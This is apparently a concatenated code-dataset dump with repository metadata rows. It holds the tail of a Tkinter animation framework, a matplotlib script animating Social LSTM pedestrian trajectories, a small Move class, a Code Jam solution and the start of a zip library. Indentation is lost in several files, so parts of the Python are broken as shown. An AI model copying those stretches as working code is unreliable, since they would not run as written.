    ``installName`` is the package name to suggest installing; when falsy
    it defaults to the module name itself.
    """
    if not installName:
        installName = importName
    banner = '**********************************************************'
    messageLines = [
        banner,
        f'** Cannot import {importName} -- it seems you need to install {installName}',
        f'** This may result in limited functionality or even a runtime error.',
        banner,
        '',
    ]
    for messageLine in messageLines:
        print(messageLine)
try: from PIL import Image, ImageTk, ImageDraw, ImageFont
except ModuleNotFoundError: failedImport('PIL', 'pillow')
if sys.platform.startswith('linux'):
try: import pyscreenshot as ImageGrabber
except ModuleNotFoundError: failedImport('pyscreenshot')
else:
try: from PIL import ImageGrab as ImageGrabber
except ModuleNotFoundError: pass # Our PIL warning is already printed above
try: import requests
except ModuleNotFoundError: failedImport('requests')
def getHash(obj):
    # This is used to detect MVC violations in redrawAll
    # @TODO: Make this more robust and efficient
    #
    # Strategy (order matters):
    #   1. If obj has a __dict__ (it's an app/object), hash its attributes.
    #   2. Otherwise recursively reduce mutable containers to hashable
    #      tuples (dicts/sets are visited in sorted-key order so the result
    #      is independent of insertion order).
    #   3. Fall back to hash(obj), and finally to hashing repr(obj) for
    #      anything unhashable.
    # NOTE(review): the bare excepts deliberately swallow everything so a
    # hash is always produced; sorted() on mixed-type sets/dict keys can
    # still raise TypeError out of this function.
    try:
        return getHash(obj.__dict__)
    except:
        if (isinstance(obj, list)): return getHash(tuple([getHash(v) for v in obj]))
        elif (isinstance(obj, set)): return getHash(sorted(obj))
        elif (isinstance(obj, dict)): return getHash(tuple([obj[key] for key in sorted(obj)]))
        else:
            try: return hash(obj)
            except: return getHash(repr(obj))
class WrappedCanvas(Canvas):
    # Enforces MVC: no drawing outside calls to redrawAll
    # Logs draw calls (for autograder) in canvas.loggedDrawingCalls
    #
    # Each create_* override records the call via self.log() (which raises
    # an MVC violation when invoked outside redrawAll) and then delegates
    # to the real Tkinter Canvas method.
    def __init__(wrappedCanvas, app):
        wrappedCanvas.loggedDrawingCalls = [ ]
        wrappedCanvas.logDrawingCalls = True
        wrappedCanvas.inRedrawAll = False
        wrappedCanvas.app = app
        super().__init__(app._root, width=app.width, height=app.height)
    def log(self, methodName, args, kwargs):
        # Called by every drawing method: enforce MVC, then record the call.
        if (not self.inRedrawAll):
            self.app._mvcViolation('you may not use the canvas (the view) outside of redrawAll')
        if (self.logDrawingCalls):
            self.loggedDrawingCalls.append((methodName, args, kwargs))
    def create_arc(self, *args, **kwargs): self.log('create_arc', args, kwargs); return super().create_arc(*args, **kwargs)
    def create_bitmap(self, *args, **kwargs): self.log('create_bitmap', args, kwargs); return super().create_bitmap(*args, **kwargs)
    def create_line(self, *args, **kwargs): self.log('create_line', args, kwargs); return super().create_line(*args, **kwargs)
    def create_oval(self, *args, **kwargs): self.log('create_oval', args, kwargs); return super().create_oval(*args, **kwargs)
    def create_polygon(self, *args, **kwargs): self.log('create_polygon', args, kwargs); return super().create_polygon(*args, **kwargs)
    def create_rectangle(self, *args, **kwargs): self.log('create_rectangle', args, kwargs); return super().create_rectangle(*args, **kwargs)
    def create_text(self, *args, **kwargs): self.log('create_text', args, kwargs); return super().create_text(*args, **kwargs)
    def create_window(self, *args, **kwargs): self.log('create_window', args, kwargs); return super().create_window(*args, **kwargs)
    def create_image(self, *args, **kwargs):
        # Accepts either image= (a Tkinter PhotoImage) or the convenience
        # pilImage= (a PIL image, converted here); exactly one is required.
        self.log('create_image', args, kwargs);
        usesImage = 'image' in kwargs
        usesPilImage = 'pilImage' in kwargs
        if ((not usesImage) and (not usesPilImage)):
            raise Exception('create_image requires an image to draw')
        elif (usesImage and usesPilImage):
            raise Exception('create_image cannot use both an image and a pilImage')
        elif (usesPilImage):
            pilImage = kwargs['pilImage']
            del kwargs['pilImage']
            if (not isinstance(pilImage, Image.Image)):
                raise Exception('create_image: pilImage value is not an instance of a PIL/Pillow image')
            image = ImageTk.PhotoImage(pilImage)
        else:
            image = kwargs['image']
            if (isinstance(image, Image.Image)):
                raise Exception('create_image: image must not be an instance of a PIL/Pillow image\n' +
                                'You perhaps meant to convert from PIL to Tkinter, like so:\n' +
                                '     canvas.create_image(x, y, image=ImageTk.PhotoImage(image))')
        kwargs['image'] = image
        return super().create_image(*args, **kwargs)
class App(object):
    '''Event-driven Tkinter animation framework (cmu_112_graphics).

    Subclasses override the "User Methods" below (appStarted, redrawAll,
    keyPressed, ...). The framework owns the Tk event loop, enforces MVC
    (no model changes in redrawAll, no drawing outside it), and provides
    screenshots plus the control-s/p/q/x keyboard shortcuts.
    '''
    majorVersion = MAJOR_VERSION
    minorVersion = MINOR_VERSION
    version = f'{majorVersion}.{minorVersion}'
    lastUpdated = LAST_UPDATED
    _theRoot = None # singleton Tkinter root object
    ####################################
    # User Methods:
    ####################################
    def redrawAll(app, canvas): pass # draw (view) the model in the canvas
    def appStarted(app): pass # initialize the model (app.xyz)
    def appStopped(app): pass # cleanup after app is done running
    def keyPressed(app, event): pass # use event.key
    def keyReleased(app, event): pass # use event.key
    def mousePressed(app, event): pass # use event.x and event.y
    def mouseReleased(app, event): pass # use event.x and event.y
    def mouseMoved(app, event): pass # use event.x and event.y
    def mouseDragged(app, event): pass # use event.x and event.y
    def timerFired(app): pass # respond to timer events
    def sizeChanged(app): pass # respond to window size changes
    ####################################
    # Implementation:
    ####################################
    def __init__(app, width=300, height=300, x=0, y=0, title=None, autorun=True, mvcCheck=True, logDrawingCalls=True):
        app.winx, app.winy, app.width, app.height = x, y, width, height
        app.timerDelay = 100 # milliseconds
        app.mouseMovedDelay = 50 # ditto
        app._title = title
        app._mvcCheck = mvcCheck
        app._logDrawingCalls = logDrawingCalls
        app._running = app._paused = False
        app._mousePressedOutsideWindow = False
        if autorun: app.run()
    def __repr__(app):
        # Show only user-defined fields (framework fields are in _ignoredFields).
        keys = set(app.__dict__.keys())
        keyValues = [ ]
        for key in sorted(keys - app._ignoredFields):
            keyValues.append(f'{key}={app.__dict__[key]}')
        return f'App({", ".join(keyValues)})'
    def setSize(app, width, height):
        app._root.geometry(f'{width}x{height}')
    def setPosition(app, x, y):
        app._root.geometry(f'+{x}+{y}')
    def showMessage(app, message):
        messagebox.showinfo('showMessage', message, parent=app._root)
    def getUserInput(app, prompt):
        return simpledialog.askstring('getUserInput', prompt)
    def loadImage(app, path=None):
        # Load a PIL image from a local file (file dialog when path is None)
        # or from an http/https URL. Disallowed inside redrawAll (I/O in view).
        if (app._canvas.inRedrawAll):
            raise Exception('Cannot call loadImage in redrawAll')
        if (path is None):
            path = filedialog.askopenfilename(initialdir=os.getcwd(), title='Select file: ',filetypes = (('Image files','*.png *.gif *.jpg'),('all files','*.*')))
            if (not path): return None
        if (path.startswith('http')):
            response = requests.request('GET', path) # path is a URL!
            image = Image.open(BytesIO(response.content))
        else:
            image = Image.open(path)
        return image
    def scaleImage(app, image, scale, antialias=False):
        # antialiasing is higher-quality but slower
        resample = Image.ANTIALIAS if antialias else Image.NEAREST
        return image.resize((round(image.width*scale), round(image.height*scale)), resample=resample)
    def getSnapshot(app):
        # Grab the canvas region of the screen as a PIL image.
        app._showRootWindow()
        x0 = app._root.winfo_rootx() + app._canvas.winfo_x()
        y0 = app._root.winfo_rooty() + app._canvas.winfo_y()
        result = ImageGrabber.grab((x0,y0,x0+app.width,y0+app.height))
        return result
    def saveSnapshot(app):
        path = filedialog.asksaveasfilename(initialdir=os.getcwd(), title='Select file: ',filetypes = (('png files','*.png'),('all files','*.*')))
        if (path):
            # defer call to let filedialog close (and not grab those pixels)
            if (not path.endswith('.png')): path += '.png'
            app._deferredMethodCall(afterId='saveSnapshot', afterDelay=0, afterFn=lambda:app.getSnapshot().save(path))
    def _togglePaused(app):
        app._paused = not app._paused
    def quit(app):
        app._running = False
        app._root.quit() # break out of root.mainloop() without closing window!
    def __setattr__(app, attr, val):
        # MVC Type-1A check: forbid model changes while redrawAll is running.
        d = app.__dict__
        d[attr] = val
        canvas = d.get('_canvas', None)
        if (d.get('running', False) and
            d.get('mvcCheck', False) and
            (canvas is not None) and
            canvas.inRedrawAll):
            app._mvcViolation(f'you may not change app.{attr} in the model while in redrawAll (the view)')
    def _printUserTraceback(app, exception, tb):
        # Print a traceback filtered down to the user's own code.
        stack = traceback.extract_tb(tb)
        lines = traceback.format_list(stack)
        inRedrawAllWrapper = False
        printLines = [ ]
        for line in lines:
            if (('"cmu_112_graphics.py"' not in line) and
                ('/cmu_112_graphics.py' not in line) and
                ('\\cmu_112_graphics.py' not in line) and
                ('/tkinter/' not in line) and
                ('\\tkinter\\' not in line)):
                printLines.append(line)
            if ('redrawAllWrapper' in line):
                inRedrawAllWrapper = True
        if (len(printLines) == 0):
            # No user code in trace, so we have to use all the code (bummer),
            # but not if we are in a redrawAllWrapper...
            if inRedrawAllWrapper:
                printLines = [' No traceback available. Error occurred in redrawAll.\n']
            else:
                printLines = lines
        print('Traceback (most recent call last):')
        for line in printLines: print(line, end='')
        print(f'Exception: {exception}')
    def _safeMethod(appMethod):
        # Decorator: catch exceptions in event handlers, stop the app, and
        # show the error both on the canvas and in a dialog box.
        def m(*args, **kwargs):
            app = args[0]
            try:
                return appMethod(*args, **kwargs)
            except Exception as e:
                app._running = False
                app._printUserTraceback(e, sys.exc_info()[2])
                if ('_canvas' in app.__dict__):
                    app._canvas.inRedrawAll = True # not really, but stops recursive MVC Violations!
                    app._canvas.create_rectangle(0, 0, app.width, app.height, fill=None, width=10, outline='red')
                    app._canvas.create_rectangle(10, app.height-50, app.width-10, app.height-10,
                                                 fill='white', outline='red', width=4)
                    app._canvas.create_text(app.width/2, app.height-40, text=f'Exception! App Stopped!', fill='red', font='Arial 12 bold')
                    app._canvas.create_text(app.width/2, app.height-20, text=f'See console for details', fill='red', font='Arial 12 bold')
                    app._canvas.update()
                app.showMessage(f'Exception: {e}\nClick ok then see console for details.')
        return m
    def _methodIsOverridden(app, methodName):
        return (getattr(type(app), methodName) is not getattr(App, methodName))
    def _mvcViolation(app, errMsg):
        app._running = False
        raise Exception('MVC Violation: ' + errMsg)
    @_safeMethod
    def _redrawAllWrapper(app):
        # Wraps user redrawAll: clears canvas, runs the draw, and compares
        # model hashes before/after to detect MVC violations.
        if (not app._running): return
        if ('deferredRedrawAll' in app._afterIdMap): return # wait for pending call
        app._canvas.inRedrawAll = True
        app._canvas.delete(ALL)
        width,outline = (10,'red') if app._paused else (0,'white')
        app._canvas.create_rectangle(0, 0, app.width, app.height, fill='white', width=width, outline=outline)
        app._canvas.loggedDrawingCalls = [ ]
        app._canvas.logDrawingCalls = app._logDrawingCalls
        hash1 = getHash(app) if app._mvcCheck else None
        try:
            app.redrawAll(app._canvas)
            hash2 = getHash(app) if app._mvcCheck else None
            if (hash1 != hash2):
                app._mvcViolation('you may not change the app state (the model) in redrawAll (the view)')
        finally:
            app._canvas.inRedrawAll = False
        app._canvas.update()
    def _deferredMethodCall(app, afterId, afterDelay, afterFn, replace=False):
        # Schedule afterFn via Tk's after(); at most one pending call per
        # afterId (replace=True cancels and reschedules an existing one).
        def afterFnWrapper():
            app._afterIdMap.pop(afterId, None)
            afterFn()
        id = app._afterIdMap.get(afterId, None)
        if ((id is None) or replace):
            if id: app._root.after_cancel(id)
            app._afterIdMap[afterId] = app._root.after(afterDelay, afterFnWrapper)
    def _deferredRedrawAll(app):
        app._deferredMethodCall(afterId='deferredRedrawAll', afterDelay=100, afterFn=app._redrawAllWrapper, replace=True)
    @_safeMethod
    def _appStartedWrapper(app):
        app.appStarted()
        app._redrawAllWrapper()
    _keyNameMap = { '\t':'Tab', '\n':'Enter', '\r':'Enter', '\b':'Backspace',
                    chr(127):'Delete', chr(27):'Escape', ' ':'Space' }
    @staticmethod
    def _useEventKey(attr):
        raise Exception(f'Use event.key instead of event.{attr}')
    @staticmethod
    def _getEventKeyInfo(event, keysym, char):
        # Normalize Tk's (keysym, char) pair into a single friendly
        # event.key string, adding a 'control-' prefix where appropriate.
        key = c = char
        hasControlKey = (event.state & 0x4 != 0)
        if ((c in [None, '']) or (len(c) > 1) or (ord(c) > 255)):
            key = keysym
            if (key.endswith('_L') or
                key.endswith('_R') or
                key.endswith('_Lock')):
                key = 'Modifier_Key'
        elif (c in App._keyNameMap):
            key = App._keyNameMap[c]
        elif ((len(c) == 1) and (1 <= ord(c) <= 26)):
            key = chr(ord('a')-1 + ord(c))
            hasControlKey = True
        if hasControlKey and (len(key) == 1):
            # don't add control- prefix to Enter, Tab, Escape, ...
            key = 'control-' + key
        return key
    class EventWrapper(Event):
        def __init__(self, event):
            for key in event.__dict__:
                if (not key.startswith('__')):
                    self.__dict__[key] = event.__dict__[key]
    class MouseEventWrapper(EventWrapper):
        def __repr__(self):
            return f'Event(x={self.x}, y={self.y})'
    class KeyEventWrapper(EventWrapper):
        def __init__(self, event):
            keysym, char = event.keysym, event.char
            del event.keysym
            del event.char
            super().__init__(event)
            self.key = App._getEventKeyInfo(event, keysym, char)
        def __repr__(self):
            return f'Event(key={repr(self.key)})'
        keysym = property(lambda *args: App._useEventKey('keysym'),
                          lambda *args: App._useEventKey('keysym'))
        char = property(lambda *args: App._useEventKey('char'),
                        lambda *args: App._useEventKey('char'))
    @_safeMethod
    def _keyPressedWrapper(app, event):
        # Framework shortcuts (control-s/p/q/x) are handled before user code.
        event = App.KeyEventWrapper(event)
        if (event.key == 'control-s'):
            app.saveSnapshot()
        elif (event.key == 'control-p'):
            app._togglePaused()
            app._redrawAllWrapper()
        elif (event.key == 'control-q'):
            app.quit()
        elif (event.key == 'control-x'):
            os._exit(0) # hard exit avoids tkinter error messages
        elif (app._running and
              (not app._paused) and
              app._methodIsOverridden('keyPressed') and
              (not event.key == 'Modifier_Key')):
            app.keyPressed(event)
            app._redrawAllWrapper()
    @_safeMethod
    def _keyReleasedWrapper(app, event):
        if (not app._running) or app._paused or (not app._methodIsOverridden('keyReleased')): return
        event = App.KeyEventWrapper(event)
        if (not event.key == 'Modifier_Key'):
            app.keyReleased(event)
            app._redrawAllWrapper()
    @_safeMethod
    def _mousePressedWrapper(app, event):
        # Presses in the titlebar (outside the canvas area) are flagged so
        # drags there don't generate spurious events.
        if (not app._running) or app._paused: return
        if ((event.x < 0) or (event.x > app.width) or
            (event.y < 0) or (event.y > app.height)):
            app._mousePressedOutsideWindow = True
        else:
            app._mousePressedOutsideWindow = False
            app._mouseIsPressed = True
            app._lastMousePosn = (event.x, event.y)
            if (app._methodIsOverridden('mousePressed')):
                event = App.MouseEventWrapper(event)
                app.mousePressed(event)
                app._redrawAllWrapper()
    @_safeMethod
    def _mouseReleasedWrapper(app, event):
        if (not app._running) or app._paused: return
        app._mouseIsPressed = False
        if app._mousePressedOutsideWindow:
            app._mousePressedOutsideWindow = False
            app._sizeChangedWrapper()
        else:
            app._lastMousePosn = (event.x, event.y)
            if (app._methodIsOverridden('mouseReleased')):
                event = App.MouseEventWrapper(event)
                app.mouseReleased(event)
                app._redrawAllWrapper()
    @_safeMethod
    def _timerFiredWrapper(app):
        if (not app._running) or (not app._methodIsOverridden('timerFired')): return
        if (not app._paused):
            app.timerFired()
            app._redrawAllWrapper()
        app._deferredMethodCall(afterId='_timerFiredWrapper', afterDelay=app.timerDelay, afterFn=app._timerFiredWrapper)
    @_safeMethod
    def _sizeChangedWrapper(app, event=None):
        if (not app._running): return
        if (event and ((event.width < 2) or (event.height < 2))): return
        if (app._mousePressedOutsideWindow): return
        app.width,app.height,app.winx,app.winy = [int(v) for v in app._root.winfo_geometry().replace('x','+').split('+')]
        if (app._lastWindowDims is None):
            app._lastWindowDims = (app.width, app.height, app.winx, app.winy)
        else:
            newDims =(app.width, app.height, app.winx, app.winy)
            if (app._lastWindowDims != newDims):
                app._lastWindowDims = newDims
                app.updateTitle()
                app.sizeChanged()
                app._deferredRedrawAll() # avoid resize crashing on some platforms
    @_safeMethod
    def _mouseMotionWrapper(app):
        # Polls the pointer position (instead of binding <Motion>) and
        # dispatches mouseMoved/mouseDragged; reschedules itself via after().
        if (not app._running): return
        mouseMovedExists = app._methodIsOverridden('mouseMoved')
        mouseDraggedExists = app._methodIsOverridden('mouseDragged')
        if ((not app._paused) and
            (not app._mousePressedOutsideWindow) and
            (((not app._mouseIsPressed) and mouseMovedExists) or
             (app._mouseIsPressed and mouseDraggedExists))):
            class MouseMotionEvent(object): pass
            event = MouseMotionEvent()
            root = app._root
            event.x = root.winfo_pointerx() - root.winfo_rootx()
            event.y = root.winfo_pointery() - root.winfo_rooty()
            event = App.MouseEventWrapper(event)
            if ((app._lastMousePosn != (event.x, event.y)) and
                (event.x >= 0) and (event.x <= app.width) and
                (event.y >= 0) and (event.y <= app.height)):
                if (app._mouseIsPressed): app.mouseDragged(event)
                else: app.mouseMoved(event)
                app._lastMousePosn = (event.x, event.y)
                app._redrawAllWrapper()
        if (mouseMovedExists or mouseDraggedExists):
            app._deferredMethodCall(afterId='mouseMotionWrapper', afterDelay=app.mouseMovedDelay, afterFn=app._mouseMotionWrapper)
    def updateTitle(app):
        app._title = app._title or type(app).__name__
        app._root.title(f'{app._title} ({app.width} x {app.height})')
    def getQuitMessage(app):
        appLabel = type(app).__name__
        if (app._title != appLabel):
            if (app._title.startswith(appLabel)):
                appLabel = app._title
            else:
                appLabel += f" '{app._title}'"
        return f"*** Closing {appLabel}. Bye! ***\n"
    def _showRootWindow(app):
        root = app._root
        root.update(); root.deiconify(); root.lift(); root.focus()
    def _hideRootWindow(app):
        root = app._root
        root.withdraw()
    @_safeMethod
    def run(app):
        # Main driver: build/reuse the singleton Tk root, wire event
        # bindings, start timers, and block in mainloop until quit.
        app._mouseIsPressed = False
        app._lastMousePosn = (-1, -1)
        app._lastWindowDims= None # set in sizeChangedWrapper
        app._afterIdMap = dict()
        # create the singleton root window
        if (App._theRoot is None):
            App._theRoot = Tk()
            App._theRoot.createcommand('exit', lambda: '') # when user enters cmd-q, ignore here (handled in keyPressed)
            App._theRoot.protocol('WM_DELETE_WINDOW', lambda: App._theRoot.app.quit()) # when user presses 'x' in title bar
            App._theRoot.bind("<Button-1>", lambda event: App._theRoot.app._mousePressedWrapper(event))
            App._theRoot.bind("<B1-ButtonRelease>", lambda event: App._theRoot.app._mouseReleasedWrapper(event))
            App._theRoot.bind("<KeyPress>", lambda event: App._theRoot.app._keyPressedWrapper(event))
            App._theRoot.bind("<KeyRelease>", lambda event: App._theRoot.app._keyReleasedWrapper(event))
            App._theRoot.bind("<Configure>", lambda event: App._theRoot.app._sizeChangedWrapper(event))
        else:
            App._theRoot.canvas.destroy()
        app._root = root = App._theRoot # singleton root!
        root.app = app
        root.geometry(f'{app.width}x{app.height}+{app.winx}+{app.winy}')
        app.updateTitle()
        # create the canvas
        root.canvas = app._canvas = WrappedCanvas(app)
        app._canvas.pack(fill=BOTH, expand=YES)
        # initialize, start the timer, and launch the app
        app._running = True
        app._paused = False
        app._ignoredFields = set(app.__dict__.keys()) | {'_ignoredFields'}
        app._appStartedWrapper()
        app._timerFiredWrapper()
        app._mouseMotionWrapper()
        app._showRootWindow()
        root.mainloop()
        app._hideRootWindow()
        app._running = False
        for afterId in app._afterIdMap: app._root.after_cancel(app._afterIdMap[afterId])
        app._afterIdMap.clear() # for safety
        app.appStopped()
        print(app.getQuitMessage())
####################################
# Ultimate_TTT:
# (with top-level functions not subclassses and methods)
####################################
class Ultimate_TTT(App):
    '''Top-level-function variant of App.

    Instead of subclassing, users define module-level functions named
    [fnPrefix][mode_]eventName (e.g. redrawAll, game_keyPressed); each App
    event is dispatched to the matching function in the caller's globals.
    '''
    _apps = dict() # maps fnPrefix to app
    def __init__(app, fnPrefix='', **kwargs):
        # Only one app per fnPrefix: quit a previous instance if it exists.
        if (fnPrefix in Ultimate_TTT._apps):
            print(f'Quitting previous version of {fnPrefix} Ultimate_TTT.')
            Ultimate_TTT._apps[fnPrefix].quit()
        if ((fnPrefix != '') and ('title' not in kwargs)):
            kwargs['title'] = f"Ultimate_TTT '{fnPrefix}'"
        Ultimate_TTT._apps[fnPrefix] = app
        app._fnPrefix = fnPrefix
        # Capture the caller's module globals so events can find their fns.
        app._callersGlobals = inspect.stack()[1][0].f_globals
        app.mode = None
        super().__init__(**kwargs)
    def _callFn(app, fn, *args):
        # Resolve '[fnPrefix][mode_]fn' in the caller's globals and call it
        # if present; missing handlers are silently ignored.
        if (app.mode != None) and (app.mode != ''):
            fn = app.mode + '_' + fn
        fn = app._fnPrefix + fn
        if (fn in app._callersGlobals): app._callersGlobals[fn](*args)
    def redrawAll(app, canvas): app._callFn('redrawAll', app, canvas)
    def appStarted(app): app._callFn('appStarted', app)
    def appStopped(app): app._callFn('appStopped', app)
    def keyPressed(app, event): app._callFn('keyPressed', app, event)
    def keyReleased(app, event): app._callFn('keyReleased', app, event)
    def mousePressed(app, event): app._callFn('mousePressed', app, event)
    def mouseReleased(app, event): app._callFn('mouseReleased', app, event)
    def mouseMoved(app, event): app._callFn('mouseMoved', app, event)
    def mouseDragged(app, event): app._callFn('mouseDragged', app, event)
    def timerFired(app): app._callFn('timerFired', app)
    def sizeChanged(app): app._callFn('sizeChanged', app)
####################################
# ModalApp + Mode:
####################################
'''
# For now, only include modes in top-level apps (see above).
class Mode(object):
def __repr__(self): return f'<{self.__class__.__name__} object>'
class ModalApp(App):
def __init__(app, *args, **kwargs):
app._mode = None
super().__init__(*args, **kwargs)
def setMode(app, mode):
if (not isinstance(mode, Mode)):
raise Exception('mode must be an instance of Mode')
app._mode = mode
def _callFn(app, fn, *args):
if (app._mode == None):
raise Exception('ModalApp must have a mode (use app.setMode())')
mode = app._mode
# method = getattr(mode, fn, None)
method = mode.__class__.__dict__.get(fn) # get method as fn
if (method != None):
method(*args)
def redrawAll(app, canvas): app._callFn('redrawAll', app, canvas)
#def appStarted(app): app._callFn('appStarted', app)
#def appStopped(app): app._callFn('appStopped', app)
def keyPressed(app, event): app._callFn('keyPressed', app, event)
def keyReleased(app, event): app._callFn('keyReleased', app, event)
def mousePressed(app, event): app._callFn('mousePressed', app, event)
def mouseReleased(app, event): app._callFn('mouseReleased', app, event)
def mouseMoved(app, event): app._callFn('mouseMoved', app, event)
def mouseDragged(app, event): app._callFn('mouseDragged', app, event)
def timerFired(app): app._callFn('timerFired', app)
def sizeChanged(app): app._callFn('sizeChanged', app)
'''
####################################
# runApp()
####################################
'''
def showGraphics(drawFn, **kwargs):
class GraphicsApp(App):
def __init__(app, **kwargs):
if ('title' not in kwargs):
kwargs['title'] = drawFn.__name__
super().__init__(**kwargs)
def redrawAll(app, canvas):
drawFn(app, canvas)
app = GraphicsApp(**kwargs)
'''
runApp = Ultimate_TTT
print(f'Loaded cmu_112_graphics version {App.version} (last updated {App.lastUpdated})')
if (__name__ == '__main__'):
try: import cmu_112_graphics_tests
except: pass
| [
"zymason@andrew.cmu.edu"
] | zymason@andrew.cmu.edu |
73dacc7715c02dbfa010874019e07b248336cfc6 | d6edd6b1405eb90b1e8d92d27863bf417b5e2ddd | /Animation.py | e25bda0198497ef53c3fa0618d7c825e52ba30f7 | [] | no_license | ttomchy/Social_LSTM | 0580afb7c31a2963df7e8ca01aba59bcc8a371f2 | e71c5c2a2c2105abc8e66e38e8d16db52d27a36a | refs/heads/master | 2022-09-21T10:36:16.677377 | 2020-06-04T13:59:29 | 2020-06-04T13:59:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,035 | py | '''
Baseline implementation: https://github.com/ajvirgona/social-lstm-pytorch/tree/master/social_lstm
By Author: Anirudh Vemula
Date: 13th June 2017
Improvements: 1\ Adjust test.py and train.py to accommodate vanilla lstm-> vlstm_train.py, vlstm_test.py
2\ Adjust optimizer
3\ reimplementing model.py and vlstm_model.py
4\ Add Animation.py
'''
import pickle
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import random
def visualize(data):
#data: results[i]
'''
len(results): num_of_batches
data[0] : Numpy matrix of shape seq_length x numNodes x 2
Contains the true trajectories of the nodes
data[1] : Numpy matrix of shape seq_length x numNodes x 2
Contains the predicted trajectories of the nodes
data[2] : A list of lists, of size seq_length
Each list contains the nodeIDs present at that time-step
data[3] : Length of observed trajectory
'''
anim_running = False
# Get the number of pedestrains in the frame
max_peds = data[0].shape[1]
# Get the number of frames
max_frames = data[0].shape[0]
# initialize figure
fig = plt.figure()
plt.axis('equal')
plt.grid()
ax = fig.add_subplot(111)
ax.set_xlim(-0.2, 1.2)
ax.set_ylim(-0.2, 1.2)
ax.plot([0, 1, 1, 0, 0], [0, 0, 1, 1, 0], color="black")
# ground truth
peds_line = []
peds_dot = []
# prediction
peds_line_predict = []
peds_dot_predict = []
#initialize color for different pedestrain
color = np.random.rand(3, max_peds)
for i in range(max_peds):
temp = ax.plot([], [],'-', lw=2,label = str(i), c = color[:,i])
peds_line.extend(temp)
temp = ax.plot([], [],'p', lw=2, label=str(i), c=color[:,i])
peds_dot.extend(temp)
temp = ax.plot([], [],'--', lw=2,label = str(i), c = color[:,i])
peds_line_predict.extend(temp)
temp = ax.plot([], [],'o', lw=2, label=str(i), c=color[:,i])
peds_dot_predict.extend(temp)
fig.subplots_adjust(top=0.8)
def init():
for ped_line in peds_line:
ped_line.set_data([], [])
for ped_dot in peds_dot:
ped_dot.set_data([], [])
for ped_line in peds_line_predict:
ped_line.set_data([], [])
for ped_dot in peds_dot_predict:
ped_dot.set_data([], [])
return peds_line,peds_dot,peds_line_predict, peds_dot_predict
def animate(i):
print('frame:', i, 'from: ', max_frames)
ped_list = data[2][i]
for ped_num, ped_line in enumerate(peds_line):
if ped_num not in ped_list:
ped_line.set_data([], [])
peds_dot[ped_num].set_data([],[])
peds_line_predict[ped_num].set_data([], [])
peds_dot_predict[ped_num].set_data([],[])
else:
(x1,y1) = ped_line.get_data()
(x2,y2) = peds_line_predict[ped_num].get_data()
ped_line.set_data(np.hstack((x1[:],data[0][i, ped_num, 0])), np.hstack((y1[:],data[0][i, ped_num, 1])))
peds_line_predict[ped_num].set_data(np.hstack((x2[:],data[1][i, ped_num, 0])), np.hstack((y2[:],data[1][i, ped_num, 1])))
peds_dot[ped_num].set_data(data[0][i,ped_num,0], data[0][i,ped_num,1])
peds_dot_predict[ped_num].set_data(data[1][i,ped_num,0], data[1][i,ped_num,1])
return peds_line, peds_dot, peds_line_predict, peds_dot_predict
# You can pause the animation by clicking on it.
def onClick(event):
nonlocal anim_running
if anim_running:
anim.event_source.stop()
anim_running = False
else:
anim.event_source.start()
anim_running = True
fig.canvas.mpl_connect('button_press_event', onClick)
# Set up formatting for the movie files
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
writer = animation.FFMpegWriter()
anim = animation.FuncAnimation(fig, animate,
init_func=init,
frames=max_frames,
interval=500)
anim.save('social4.mp4', writer = writer)
#anim.save('ground_truth_02.html')
plt.show()
def main():
test_dataset = '4'
save_directory = 'save_social_model/'
save_directory += str(test_dataset) + '/'
plot_directory = 'plot/'
f = open(save_directory + 'results3_05.pkl', 'rb')
results = pickle.load(f)
size = len(results)
BATCH_result = results[-1]
visualize(BATCH_result)
f.close()
if __name__ == '__main__':
main() | [
"wanxinyu0001@gmail.com"
] | wanxinyu0001@gmail.com |
9b4da458ddc0baab23ff6849c6435da673740b91 | 50ca8d6e7f989854f3059cf721c40225f340b774 | /python/Move.py | 16498e1d053c013a7b76e5e9a2642d892f9a1c3a | [] | no_license | atwenzel/assignment2 | af07b551ef6861e7412c2e2b9447cf238b122d43 | e9224575f1ba393df00de28e1450d257afee4c6c | refs/heads/master | 2021-01-19T06:37:11.330864 | 2017-06-07T13:11:57 | 2017-06-07T13:11:57 | 87,470,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | """
Implements the Move base class
"""
#Global
#Local
from Pawn import Pawn
class Move:
def __init__(self, pawn):
self.pawn = pawn
if __name__ == "__main__":
print("Base Move class")
| [
"alexanderwenzel2017@u.northwestern.edu"
] | alexanderwenzel2017@u.northwestern.edu |
06c23408811bd37ee1ea076d37ef63244b96f858 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/945.py | a43e4458d2b1f38b912356b2ce0d2242713cfb2c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | def nombre_ami(b):
debout = 0
ami = 0
compteur = 0
ami_en_plus = 0
for chiffre in b:
if compteur > debout:
ami_en_plus = (compteur - debout)
ami += ami_en_plus
debout += ami_en_plus
debout += int(chiffre)
compteur += 1
return str(ami)
def solution_jam1():
source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
3ce6e46050c23393ede97fc6e868480a8d50301b | 783b3c3ca0ee158802f1946073eb4fc5b1c6d5a2 | /xlib/ziplib_spec.py | df549054b61e7c90cdb54130c5cb01afc3fa2e18 | [] | no_license | ggjjlldd/zipserver | dd6d7fab58c132e7eead781c29c831b209c20837 | e80d6ef81420050d737ba983b752e692ccb6ee88 | refs/heads/master | 2020-05-20T07:42:50.714315 | 2013-09-24T02:07:33 | 2013-09-24T02:07:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,995 | py | """
Read and write ZIP files.
"""
import struct, os, time, sys, shutil
import binascii, cStringIO, stat
import io
import re
import chardet
try:
import zlib # We may need its compression method
crc32 = zlib.crc32
except ImportError:
